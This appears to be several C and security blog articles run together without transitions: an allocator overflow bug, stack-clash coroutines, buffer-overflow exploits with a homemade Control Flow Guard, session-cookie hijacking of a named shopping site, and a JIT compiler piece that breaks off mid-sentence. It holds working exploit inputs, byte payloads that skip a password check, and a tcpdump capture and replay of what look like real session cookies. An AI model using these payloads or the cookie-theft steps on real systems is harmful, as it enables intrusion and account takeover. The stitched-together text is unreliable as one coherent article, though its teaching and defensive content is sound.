Next up is a paranoid wrapper for strtoul() that defensively checks its inputs. If it’s out of range of an unsigned long, it bails out. If there’s trailing garbage, it bails out. If there’s no number at all, it bails out. If you make prolonged eye contact, it bails out.
unsigned long
safe_strtoul(char *nptr, char **endptr, int base)
{
errno = 0;
unsigned long n = strtoul(nptr, endptr, base);
if (errno) {
perror(nptr);
exit(EXIT_FAILURE);
} else if (nptr == *endptr) {
fprintf(stderr, "Expected an integer\n");
exit(EXIT_FAILURE);
} else if (!isspace(**endptr)) {
fprintf(stderr, "Invalid character '%c'\n", **endptr);
exit(EXIT_FAILURE);
}
return n;
}
The main()
function parses the header using this wrapper and allocates
some zeroed memory:
unsigned long width = safe_strtoul(p, &p, 10);
unsigned long height = safe_strtoul(p, &p, 10);
unsigned char *pixels = naive_calloc(m, width, height);
if (!pixels) {
fputs("Not enough memory\n", stderr);
exit(EXIT_FAILURE);
}
Then there’s a command processing loop, also using safe_strtoul(). It carefully checks bounds against width and height. Finally it writes out a Netpbm, P2 (.pgm) format.
printf("P2\n%ld %ld 255\n", width, height);
for (unsigned long y = 0; y < height; y++) {
for (unsigned long x = 0; x < width; x++)
printf("%d ", pixels[y * width + x]);
putchar('\n');
}
The vulnerability is in something I’ve shown above. Can you find it?
Did you find it? If you’re on a platform with 64-bit long, here’s your exploit:
V2 16 1152921504606846977
And here’s an exploit for 32-bit long:
V2 16 268435457
Here’s how it looks in action. The most obvious result is that the program crashes:
$ echo V2 16 1152921504606846977 | ./mstack > capture.txt
User: coolguy
Password: mysecret
Segmentation fault
Here are the initial contents of capture.txt:
P2
16 1152921504606846977 255
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
109 121 115 101 99 114 101 116 10 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Where did those junk numbers come from in the image data? Plug them into an ASCII table and you’ll get “mysecret”. Despite allocating the image with naive_calloc(), the password has found its way into the image! How could this be?
What happened is that width * height overflows an unsigned long. (Well, technically speaking, unsigned integers are defined not to overflow in C, wrapping around instead, but it’s really the same thing.) In naive_calloc(), the overflow results in a value of 16, so it only allocates and clears 16 bytes. The requested allocation “succeeds” despite far exceeding the available memory. The caller has been given a lot less memory than expected, and the memory believed to have been allocated contains a password.
The final part that writes the output doesn’t multiply the integers and doesn’t need to test for overflow. It uses a nested loop instead, continuing along with the original, impossible image size.
How do we fix this? Add an overflow check at the beginning of the
naive_calloc()
function (making it no longer naive). This is what the
real calloc()
does.
if (nmemb && size > -1UL / nmemb)
return 0;
The frightening takeaway is that this check is very easy to forget. It’s a subtle bug with potentially disastrous consequences.
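Here’s the guard applied in a standalone sketch, built over plain malloc() rather than the article’s mstack allocator so it’s self-contained:

```c
#include <stdlib.h>
#include <string.h>

/* Like naive_calloc(), but rejects requests whose byte count
 * would wrap around, the same way a real calloc() does. */
void *
checked_calloc(unsigned long nmemb, unsigned long size)
{
    if (nmemb && size > -1UL / nmemb)
        return 0;  /* nmemb * size would overflow */
    void *p = malloc(nmemb * size);
    if (p)
        memset(p, 0, nmemb * size);
    return p;
}
```

With this check in place, the pathological header from the exploit gets a clean “Not enough memory” failure instead of a tiny, dirty allocation.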
In practice, this sort of program wouldn’t have sensitive data resident in memory. Instead an attacker would target the program’s stack with those s commands — specifically the return pointers — and perform a ROP attack against the application. With the exploit header above and a platform where long is the same size as size_t, the program will behave as if all available memory has been allocated to the image, so the s command could be used to poke custom values anywhere in memory. This is a much more complicated exploit, and it has to contend with ASLR and a random stack gap, but it’s feasible.
You can find the complete code for this article here, ready to run:
But first, what is a stack clash? Here’s a rough picture of the
typical way process memory is laid out. The stack starts at a high
memory address and grows downwards. Code and static data sit at low
memory, with a brk
pointer growing upward to make small allocations.
In the middle is the heap, where large allocations and memory mappings
take place.
Below the stack is a slim guard page that divides the stack and the region of memory reserved for the heap. Reading or writing to that memory will trap, causing the program to crash or some special action to be taken. The goal is to prevent the stack from growing into the heap, which could cause all sorts of trouble, like security issues.
The problem is that this thin guard page isn’t enough. It’s possible to put a large allocation on the stack, never read or write to it, and completely skip over the guard page, such that the heap and stack overlap without detection.
Once this happens, writes into the heap will change memory on the stack and vice versa. If an attacker can cause the program to make such a large allocation on the stack, then legitimate writes into memory on the heap can manipulate local variables or return pointers, changing the program’s control flow. This can bypass buffer overflow protections, such as stack canaries.
Now, I’m going to abruptly change topics to discuss binary search trees. We’ll get back to stack clash in a bit. Suppose we have a binary tree which we would like to iterate depth-first. For this demonstration, here’s the C interface to the binary tree.
struct tree {
struct tree *left;
struct tree *right;
char *key;
char *value;
};
void tree_insert(struct tree **, char *k, char *v);
char *tree_find(struct tree *, char *k);
void tree_visit(struct tree *, void (*f)(char *, char *));
void tree_destroy(struct tree *);
An empty tree is the NULL pointer, hence the double-pointer for insert. In the demonstration it’s an unbalanced search tree, but this could very well be a balanced search tree with the addition of another field on the structure.
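The insert function itself isn’t shown, but the double-pointer interface implies something like the following sketch (hypothetical; the article’s version may differ, and allocation-failure handling is omitted for brevity):

```c
#include <stdlib.h>
#include <string.h>

struct tree {
    struct tree *left;
    struct tree *right;
    char *key;
    char *value;
};

/* Walk the links through the double pointer until reaching an
 * empty (NULL) slot, then attach a fresh node there. Unbalanced,
 * as in the article's demonstration. */
void
tree_insert(struct tree **t, char *k, char *v)
{
    while (*t) {
        if (strcmp(k, (*t)->key) < 0)
            t = &(*t)->left;
        else
            t = &(*t)->right;
    }
    *t = malloc(sizeof(**t));
    (*t)->left = (*t)->right = 0;
    (*t)->key = k;
    (*t)->value = v;
}
```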
For the traversal, first visit the root node, then traverse its left tree, and finally traverse its right tree. It makes for a simple, recursive definition — the sort of thing you’d teach a beginner. Here’s a definition that accepts a callback, which the caller will use to visit each key/value in the tree. This really is as simple as it gets.
void
tree_visit(struct tree *t, void (*f)(char *, char *))
{
if (t) {
f(t->key, t->value);
tree_visit(t->left, f);
tree_visit(t->right, f);
}
}
Unfortunately this isn’t so convenient for the caller, who has to split off a callback function that lacks context, then hand over control to the traversal function.
void
printer(char *k, char *v)
{
printf("%s = %s\n", k, v);
}
void
print_tree(struct tree *tree)
{
tree_visit(tree, printer);
}
Usually it’s much nicer for the caller if instead it’s provided an iterator, which the caller can invoke at will. Here’s an interface for it, just two functions.
struct tree_it *tree_iterator(struct tree *);
int tree_next(struct tree_it *, char **k, char **v);
The first constructs an iterator object, and the second one visits a key/value pair each time it’s called. It returns 0 when traversal is complete, automatically freeing any resources associated with the iterator.
The caller now looks like this:
char *k, *v;
struct tree_it *it = tree_iterator(tree);
while (tree_next(it, &k, &v))
printf("%s = %s\n", k, v);
Notice I haven’t defined struct tree_it. That’s because I’ve got four different implementations, each taking a different approach. The last one will use stack clashing.
With just the standard facilities provided by C, there’s some manual bookkeeping that has to take place in order to convert the recursive definition into an iterator. Depth-first traversal is a stack-oriented process, and with recursion the stack is implicit in the call stack. As an iterator, the traversal stack needs to be managed explicitly. The iterator needs to keep track of the path it took so that it can backtrack, which means keeping track of parent nodes as well as which branch was taken.
Here’s my little implementation, which, to keep things simple, has a hard depth limit of 32. Its structure definition includes a stack of node pointers, and 2 bits of information per visited node, stored across a 64-bit integer.
struct tree_it {
struct tree *stack[32];
unsigned long long state;
int nstack;
};
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->stack[0] = t;
it->state = 0;
it->nstack = 1;
return it;
}
The 2 bits track three different states for each visited node: not yet visited, left subtree visited, and right subtree visited.
It works out to the following. Don’t worry too much about trying to understand how this works. My point is to demonstrate that converting the recursive definition into an iterator complicates the implementation.
int
tree_next(struct tree_it *it, char **k, char **v)
{
while (it->nstack) {
int shift = (it->nstack - 1) * 2;
int state = 3u & (it->state >> shift);
struct tree *t = it->stack[it->nstack - 1];
it->state += 1ull << shift;
switch (state) {
case 0:
*k = t->key;
*v = t->value;
if (t->left) {
it->stack[it->nstack++] = t->left;
it->state &= ~(3ull << (shift + 2));
}
return 1;
case 1:
if (t->right) {
it->stack[it->nstack++] = t->right;
it->state &= ~(3ull << (shift + 2));
}
break;
case 2:
it->nstack--;
break;
}
}
free(it);
return 0;
}
Wouldn’t it be nice to keep both the recursive definition while also getting an iterator? There’s an exact solution to that: coroutines.
C doesn’t come with coroutines, but there are a number of libraries available. We can also build our own coroutines. One way to do that is with user contexts (<ucontext.h>) provided by the X/Open System Interfaces Extension (XSI), an extension to POSIX. This set of functions allows programs to create their own call stacks and switch between them. That’s the key ingredient for coroutines. Caveat: These functions aren’t widely available, and probably shouldn’t be used in new code.
Here’s my iterator structure definition.
#define _XOPEN_SOURCE 600
#include <ucontext.h>
struct tree_it {
char *k;
char *v;
ucontext_t coroutine;
ucontext_t yield;
};
It needs one context for the original stack and one context for the iterator’s stack. Each time the iterator is invoked, the program will switch to the other stack, find the next value, then switch back. This process is called yielding. Values are passed between contexts using the k (key) and v (value) fields on the iterator.
Before I get into initialization, here’s the actual traversal coroutine. It’s nearly the same as the original recursive definition except for the swapcontext(). This is the yield, pausing execution and sending control back to the caller. The current context is saved in the first argument, and the second argument becomes the current context.
static void
coroutine(struct tree *t, struct tree_it *it)
{
if (t) {
it->k = t->key;
it->v = t->value;
swapcontext(&it->coroutine, &it->yield);
coroutine(t->left, it);
coroutine(t->right, it);
}
}
While the actual traversal is simple again, initialization is more
complicated. The first problem is that there’s no way to pass pointer
arguments to the coroutine. Technically only int
arguments are
permitted. (All the online tutorials get this wrong.) To work around
this problem, I smuggle the arguments in as global variables. This
would cause problems should two different threads try to create
iterators at the same time, even on different trees.
static struct tree *tree_arg;
static struct tree_it *tree_it_arg;
static void
coroutine_init(void)
{
coroutine(tree_arg, tree_it_arg);
}
The stack has to be allocated manually, which I do with a call to malloc(). Nothing fancy is needed, though this means the new stack won’t have a guard page. For the stack size, I use the suggested value of SIGSTKSZ. The makecontext() function is what creates the new context from scratch, but the new context must first be initialized with getcontext(), even though that particular snapshot won’t actually be used.
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->coroutine.uc_stack.ss_sp = malloc(SIGSTKSZ);
it->coroutine.uc_stack.ss_size = SIGSTKSZ;
it->coroutine.uc_link = &it->yield;
getcontext(&it->coroutine);
makecontext(&it->coroutine, coroutine_init, 0);
tree_arg = t;
tree_it_arg = it;
return it;
}
Notice I gave it a function pointer, a lot like I’m starting a new thread. This is no coincidence. There’s a lot of similarity between coroutines and multiple threads, as you’ll soon see.
Finally the iterator function itself. Since NULL isn’t a valid key, it initializes the key to NULL before yielding to the iterator context. If the iterator has no more nodes to visit, it doesn’t set the key, which can be detected when control returns.
int
tree_next(struct tree_it *it, char **k, char **v)
{
it->k = 0;
swapcontext(&it->yield, &it->coroutine);
if (it->k) {
*k = it->k;
*v = it->v;
return 1;
} else {
free(it->coroutine.uc_stack.ss_sp);
free(it);
return 0;
}
}
That’s all it takes to create and operate a coroutine in C, provided you’re on a system with these XSI extensions.
Instead of a coroutine, we could just use actual threads and a couple of semaphores to synchronize them. This is a heavy implementation and also probably shouldn’t be used in practice, but at least it’s fully portable.
Here’s the structure definition:
struct tree_it {
struct tree *t;
char *k;
char *v;
sem_t visitor;
sem_t main;
pthread_t thread;
};
The main thread will wait on one semaphore and the iterator thread will wait on the other. This should sound very familiar.
The actual traversal function looks the same, but with sem_post()
and sem_wait()
as the yield.
static void
visit(struct tree *t, struct tree_it *it)
{
if (t) {
it->k = t->key;
it->v = t->value;
sem_post(&it->main);
sem_wait(&it->visitor);
visit(t->left, it);
visit(t->right, it);
}
}
There’s a separate function to initialize the iterator context again.
static void *
thread_entrance(void *arg)
{
struct tree_it *it = arg;
sem_wait(&it->visitor);
visit(it->t, it);
sem_post(&it->main);
return 0;
}
Creating the iterator only requires initializing the semaphores and creating the thread:
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->t = t;
sem_init(&it->visitor, 0, 0);
sem_init(&it->main, 0, 0);
pthread_create(&it->thread, 0, thread_entrance, it);
return it;
}
The iterator function looks just like the coroutine version.
int
tree_next(struct tree_it *it, char **k, char **v)
{
it->k = 0;
sem_post(&it->visitor);
sem_wait(&it->main);
if (it->k) {
*k = it->k;
*v = it->v;
return 1;
} else {
pthread_join(it->thread, 0);
sem_destroy(&it->main);
sem_destroy(&it->visitor);
free(it);
return 0;
}
}
Overall, this is almost identical to the coroutine version.
Finally I can tie this back into the topic at hand. Without either XSI extensions or Pthreads, we can (usually) create coroutines by abusing setjmp() and longjmp(). Technically this violates two of C’s rules and relies on undefined behavior, but it generally works. This is not my own invention, and it dates back to at least 2010.
From the very beginning, C has provided a crude “exception” mechanism that allows the stack to be abruptly unwound back to a previous state. It’s a sort of non-local goto. Call setjmp() to capture an opaque jmp_buf object to be used in the future. This function returns 0 the first time. Hand that jmp_buf to longjmp() later, even in a different function, and setjmp() will return again, this time with a non-zero value.
It’s technically unsuitable for coroutines because the jump is a
one-way trip. The unwound stack invalidates any jmp_buf
that was
created after the target of the jump. In practice, though, you can
still use these jumps, which is one rule being broken.
That’s where stack clashing comes into play. In order for it to be a
proper coroutine, it needs to have its own stack. But how can we do
that with these primitive C utilities? Extend the stack to overlap
the heap, call setjmp()
to capture a coroutine on it, then return.
Generally we can get away with using longjmp()
to return to this
heap-allocated stack.
Here’s my iterator definition for this one. Like the XSI context
struct, this has two jmp_buf
“contexts.” The stack
holds the
iterator’s stack buffer so that it can be freed, and the gap
field
will be used to prevent the optimizer from spoiling our plans.
struct tree_it {
char *k;
char *v;
char *stack;
volatile char *gap;
jmp_buf coroutine;
jmp_buf yield;
};
The coroutine looks familiar again. This time the yield is performed with setjmp() and longjmp(), just like swapcontext(). Remember that setjmp() returns twice, hence the branch. The longjmp() never returns.
static void
coroutine(struct tree *t, struct tree_it *it)
{
if (t) {
it->k = t->key;
it->v = t->value;
if (!setjmp(it->coroutine))
longjmp(it->yield, 1);
coroutine(t->left, it);
coroutine(t->right, it);
}
}
Next is the tricky part to cause the stack clash. First, allocate the
new stack with malloc()
so that we can get its address. Then use a
local variable on the stack to determine how much the stack needs to
grow in order to overlap with the allocation. Taking the difference
between these pointers is illegal as far as the language is concerned,
making this the second rule I’m breaking. I can imagine an
implementation where the stack and heap are in two separate
kinds of memory, and it would be meaningless to take the difference. I
don’t actually have to imagine very hard, because this is actually how
it used to work on the 8086 with its segmented memory
architecture.
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->stack = malloc(STACK_SIZE);
char marker;
char gap[&marker - it->stack - STACK_SIZE];
it->gap = gap; // prevent optimization
if (!setjmp(it->yield))
coroutine_init(t, it);
return it;
}
I’m using a variable-length array (VLA) named gap
to indirectly
control the stack pointer, moving it over the heap. I’m assuming the
stack grows downward, since otherwise the sign would be wrong.
The compiler is smart and will notice I’m not actually using gap, and it’s happy to throw it away. In fact, it’s vitally important that I don’t touch it since the guard page, along with a bunch of unmapped memory, is actually somewhere in the middle of that array. I only want the array for its side effect, but that side effect isn’t officially supported, which means the optimizer doesn’t need to consider it in its decisions. To inhibit the optimizer, I store the array’s address where someone might potentially look at it, meaning the array has to exist.
Finally, the iterator function looks just like the others, again.
int
tree_next(struct tree_it *it, char **k, char **v)
{
it->k = 0;
if (!setjmp(it->yield))
longjmp(it->coroutine, 1);
if (it->k) {
*k = it->k;
*v = it->v;
return 1;
} else {
free(it->stack);
free(it);
return 0;
}
}
And that’s it: a nasty hack using a stack clash to create a context
for a setjmp()
+longjmp()
coroutine.
If an application has a buffer overflow vulnerability, an attacker may use it to overwrite a function pointer and, by the call through that pointer, control the execution flow of the program. This is one way to initiate a Return Oriented Programming (ROP) attack, where the attacker constructs a chain of gadget addresses — a gadget being a couple of instructions followed by a return instruction, all in the original program — using the indirect call as the starting point. The execution then flows from gadget to gadget so that the program does what the attacker wants it to do, all without the attacker supplying any code.
The two most widely practiced ROP attack mitigation techniques today are Address Space Layout Randomization (ASLR) and stack protectors. The former randomizes the base address of executable images (programs, shared libraries) so that process memory layout is unpredictable to the attacker. The addresses in the ROP attack chain depend on the run-time memory layout, so the attacker must also find and exploit an information leak to bypass ASLR.
For stack protectors, the compiler allocates a canary on the stack above other stack allocations and sets the canary to a per-thread random value. If a buffer overflows to overwrite the function return pointer, the canary value will also be overwritten. Before the function returns by the return pointer, it checks the canary. If the canary doesn’t match the known value, the program is aborted.
CFG works similarly — performing a check prior to passing control to the address in a pointer — except that instead of checking a canary, it checks the target address itself. This is a lot more sophisticated, and, unlike a stack canary, essentially requires coordination by the platform. The check must be informed on all valid call targets, whether from the main program or from shared libraries.
While not (yet?) widely deployed, a worthy mention is Clang’s SafeStack. Each thread gets two stacks: a “safe stack” for return pointers and other safely-accessed values, and an “unsafe stack” for buffers and such. Buffer overflows will corrupt other buffers but will not overwrite return pointers, limiting the effect of their damage.
Consider this trivial C program, demo.c:
int
main(void)
{
char name[8];
gets(name);
printf("Hello, %s.\n", name);
return 0;
}
It reads a name into a buffer and prints it back out with a greeting.
While trivial, it’s far from innocent. That naive call to gets()
doesn’t check the bounds of the buffer, introducing an exploitable
buffer overflow. It’s so obvious that both the compiler and linker
will yell about it.
For simplicity, suppose the program also contains a dangerous function.
void
self_destruct(void)
{
puts("**** GO BOOM! ****");
}
The attacker can use the buffer overflow to call this dangerous function.
To make this attack simpler for the sake of the article, assume the program isn’t using ASLR (e.g. without -fpie/-pie, or with -fno-pie/-no-pie). For this particular example, I’ll also explicitly disable buffer overflow protections (e.g. _FORTIFY_SOURCE and stack protectors).
$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fno-stack-protector \
-o demo demo.c
First, find the address of self_destruct().
$ readelf -a demo | grep self_destruct
46: 00000000004005c5 10 FUNC GLOBAL DEFAULT 13 self_destruct
This is on x86-64, so it’s a 64-bit address. The size of the name buffer is 8 bytes, and peeking at the assembly I see an extra 8 bytes allocated above, so there’s 16 bytes to fill, then 8 bytes to overwrite the return pointer with the address of self_destruct.
$ echo -ne 'xxxxxxxxyyyyyyyy\xc5\x05\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
Hello, xxxxxxxxyyyyyyyy?@.
**** GO BOOM! ****
Segmentation fault
With this input I’ve successfully exploited the buffer overflow to divert control to self_destruct(). When main tries to return into libc, it instead jumps to the dangerous function, and then crashes when that function tries to return — though, presumably, the system would have self-destructed already. Turning on the stack protector stops this exploit.
$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fstack-protector \
-o demo demo.c
$ ./demo < boom
Hello, xxxxxxxxaaaaaaaa?@.
*** stack smashing detected ***: ./demo terminated
======= Backtrace: =========
... lots of backtrace stuff ...
The stack protector successfully blocks the exploit. To get around this, I’d have to either guess the canary value or discover an information leak that reveals it.
The stack protector transformed the program into something that looks like the following:
int
main(void)
{
long __canary = __get_thread_canary();
char name[8];
gets(name);
printf("Hello, %s.\n", name);
if (__canary != __get_thread_canary())
abort();
return 0;
}
However, it’s not actually possible to implement the stack protector within C. Buffer overflows are undefined behavior, so the canary could only ever be modified through undefined behavior, and the compiler would be free to assume the canary never changes and optimize the check away.
After the attacker successfully self-destructed the last computer, upper management has mandated password checks before all self-destruction procedures. Here’s what it looks like now:
void
self_destruct(char *password)
{
if (strcmp(password, "12345") == 0)
puts("**** GO BOOM! ****");
}
The password is hardcoded, and it’s the kind of thing an idiot would have on his luggage, but assume it’s actually unknown to the attacker. Especially since, as I’ll show shortly, it won’t matter. Upper management has also mandated stack protectors, so assume that’s enabled from here on.
Additionally, the program has evolved a bit, and now uses a function pointer for polymorphism.
struct greeter {
char name[8];
void (*greet)(struct greeter *);
};
void
greet_hello(struct greeter *g)
{
printf("Hello, %s.\n", g->name);
}
void
greet_aloha(struct greeter *g)
{
printf("Aloha, %s.\n", g->name);
}
There’s now a greeter object and the function pointer makes its behavior polymorphic. Think of it as a hand-coded virtual function for C. Here’s the new (contrived) main:
int
main(void)
{
struct greeter greeter = {.greet = greet_hello};
gets(greeter.name);
greeter.greet(&greeter);
return 0;
}
(In a real program, something else provides greeter and picks its own function pointer for greet.)
Rather than overwriting the return pointer, the attacker has the opportunity to overwrite the function pointer on the struct. Let’s reconstruct the exploit like before.
$ readelf -a demo | grep self_destruct
54: 00000000004006a5 10 FUNC GLOBAL DEFAULT 13 self_destruct
We don’t know the password, but we do know (from peeking at the disassembly) that the password check is 16 bytes. The attack should instead jump 16 bytes into the function, skipping over the check (0x4006a5 + 16 = 0x4006b5).
$ echo -ne 'xxxxxxxx\xb5\x06\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
**** GO BOOM! ****
Neither the stack protector nor the password were of any help. The stack protector only protects the return pointer, not the function pointer on the struct.
This is where the Control Flow Guard comes into play. With CFG
enabled, the compiler inserts a check before calling the greet()
function pointer. It must point to the beginning of a known function,
otherwise it will abort just like the stack protector. Since the
middle of self_destruct()
isn’t the beginning of a function, it
would abort if this exploit is attempted.
However, I’m on Linux and there’s no CFG on Linux (yet?). So I’ll implement it myself, with manual checks.
As described in the PDF linked at the top of this article, CFG on Windows is implemented using a bitmap. Each bit in the bitmap represents 8 bytes of memory. If those 8 bytes contain the beginning of a function, the bit will be set to one. Checking a pointer means checking its associated bit in the bitmap.
For my CFG, I’ve decided to keep the same 8-byte resolution: the bottom three bits of the target address will be dropped. The next 24 bits will be used to index into the bitmap. All other bits in the pointer will be ignored. A 24-bit index means the bitmap will only be 2MB.
These 24 bits are perfectly sufficient for 32-bit systems, but on 64-bit systems there may be false positives: some addresses will not represent the start of a function, but will have their bit set to 1. This is acceptable, especially because only functions known to be targets of indirect calls will be registered in the table, reducing the false positive rate.
Note: Relying on the bits of a pointer cast to an integer is unspecified and isn’t portable, but this implementation will work fine anywhere I would care to use it.
Here are the CFG parameters. I’ve made them macros so that they can
easily be tuned at compile-time. The cfg_bits
is the integer type
backing the bitmap array. The CFG_RESOLUTION
is the number of bits
dropped, so “3” is a granularity of 8 bytes.
typedef unsigned long cfg_bits;
#define CFG_RESOLUTION 3
#define CFG_BITS 24
Given a function pointer f
, this macro extracts the bitmap index.
#define CFG_INDEX(f) \
(((uintptr_t)f >> CFG_RESOLUTION) & ((1UL << CFG_BITS) - 1))
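For instance, the 0x4006b5 jump target from the exploit above lands at bit index 0x800d6. A quick sanity check, repeating the definitions so the snippet stands alone:

```c
#include <assert.h>
#include <stdint.h>

/* Same parameters and macro as above, repeated for a standalone check */
#define CFG_RESOLUTION 3
#define CFG_BITS 24
#define CFG_INDEX(f) \
    (((uintptr_t)f >> CFG_RESOLUTION) & ((1UL << CFG_BITS) - 1))

/* 0x4006b5 >> 3 = 0x800d6, which already fits within 24 bits */
```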
The CFG bitmap is just an array of integers. Zero it to initialize.
struct cfg {
cfg_bits bitmap[(1UL << CFG_BITS) / (sizeof(cfg_bits) * CHAR_BIT)];
};
Functions are manually registered in the bitmap using
cfg_register()
.
void
cfg_register(struct cfg *cfg, void *f)
{
unsigned long i = CFG_INDEX(f);
size_t z = sizeof(cfg_bits) * CHAR_BIT;
cfg->bitmap[i / z] |= 1UL << (i % z);
}
Because functions are registered at run-time, it’s fully compatible
with ASLR. If ASLR is enabled, the bitmap will be a little different
each run. On the same note, it may be worth XORing each bitmap element
with a random, run-time value — along the same lines as the stack
canary value — to make it harder for an attacker to manipulate the
bitmap should they gain the ability to overwrite it through a vulnerability.
Alternatively the bitmap could be switched to read-only (e.g.
mprotect()
) once everything is registered.
And finally, the check function, used immediately before indirect
calls. It ensures f
was previously passed to cfg_register()
(except for false positives, as discussed). Since it will be invoked
often, it needs to be fast and simple.
void
cfg_check(struct cfg *cfg, void *f)
{
unsigned long i = CFG_INDEX(f);
size_t z = sizeof(cfg_bits) * CHAR_BIT;
if (!((cfg->bitmap[i / z] >> (i % z)) & 1))
abort();
}
And that’s it! Now augment main
to make use of it:
struct cfg cfg;
int
main(void)
{
cfg_register(&cfg, self_destruct); // to prove this works
cfg_register(&cfg, greet_hello);
cfg_register(&cfg, greet_aloha);
struct greeter greeter = {.greet = greet_hello};
gets(greeter.name);
cfg_check(&cfg, greeter.greet);
greeter.greet(&greeter);
return 0;
}
And now attempting the exploit:
$ ./demo < boom
Aborted
Normally self_destruct()
wouldn’t be registered since it’s not a
legitimate target of an indirect call, but the exploit still didn’t
work because it called into the middle of self_destruct()
, which
isn’t a valid address in the bitmap. The check aborts the program
before it can be exploited.
In a real application I would have a global cfg
bitmap for
the whole program, and define cfg_check()
in a header as an inline
function.
Despite being possible to implement in straight C without the help of the toolchain, it would be far less cumbersome and error-prone to let the compiler and platform handle Control Flow Guard. That’s the right place to implement it.
Update: Ted Unangst pointed out that OpenBSD performs a similar check in its mbuf library. Instead of a bitmap, the function pointer is replaced with an index into an array of registered function pointers. That approach is cleaner, more efficient, completely portable, and has no false positives.
These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.
The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.
Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer get this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.
I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.
To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.
The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.
tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
grep "^Cookie: "
This command tells tcpdump to dump selected packet content as ASCII
(-A
). It also sets output to line-buffered so that I can see packets
as soon as they arrive (-l
). The filter will only match packets
going out to this website and only on port 80 (HTTP), so I won’t see
any extraneous noise (dst <addr> and dst port <port>
). Finally, I
crudely run that all through grep to see if any cookies fall out.
On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:
Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
-bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4
That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.
document.cookie = "JSESSIONID=99004F61A4ED162641DC36046A" +
"C81EAB.prd_rrs12";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
"1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";
Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.
The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents the JavaScript from accessing them, since an active attacker could inject their own JavaScript in the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.
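In HTTP terms, that fix is two attributes on each Set-Cookie response header (session value abbreviated here):

```
Set-Cookie: JSESSIONID=<session id>; Secure; HttpOnly
```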
However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.
Monday’s /r/dailyprogrammer challenge was to write a program to
read a recurrence relation definition and, through interpretation,
iterate it to some number of terms. It’s given an initial term
(u(0)
) and a sequence of operations, f
, to apply to the previous
term (u(n + 1) = f(u(n))
) to compute the next term. Since it’s an
easy challenge, the operations are limited to addition, subtraction,
multiplication, and division, with one operand each.
For example, the relation u(n + 1) = (u(n) + 2) * 3 - 5
would be
input as +2 *3 -5
. If u(0) = 0
then,
u(1) = 1
u(2) = 4
u(3) = 13
u(4) = 40
u(5) = 121
Rather than write an interpreter to apply the sequence of operations, for my submission (mirror) I took the opportunity to write a simple x86-64 Just-In-Time (JIT) compiler. So rather than stepping through the operations one by one, my program converts the operations into native machine code and lets the hardware do the work directly. In this article I’ll go through how it works and how I did it.
Update: The follow-up challenge uses Reverse Polish notation to allow for more complicated expressions. I wrote another JIT compiler for my submission (mirror).
Modern operating systems have page-granularity protections for different parts of process memory: read, write, and execute. Code can only be executed from memory with the execute bit set on its page, memory can only be changed when its write bit is set, and some pages aren’t allowed to be read. In a running process, the pages holding program code and loaded libraries will have their write bit cleared and execute bit set. Most of the other pages will have their execute bit cleared and their write bit set.
The reason for this is twofold. First, it significantly increases the security of the system. If untrusted input was read into executable memory, an attacker could input machine code (shellcode) into the buffer, then exploit a flaw in the program to cause control flow to jump to and execute that code. If the attacker is only able to write code to non-executable memory, this attack becomes a lot harder. The attacker has to rely on code already loaded into executable pages (return-oriented programming).
Second, it catches program bugs sooner and reduces their impact, so
there’s less chance for a flawed program to accidentally corrupt user
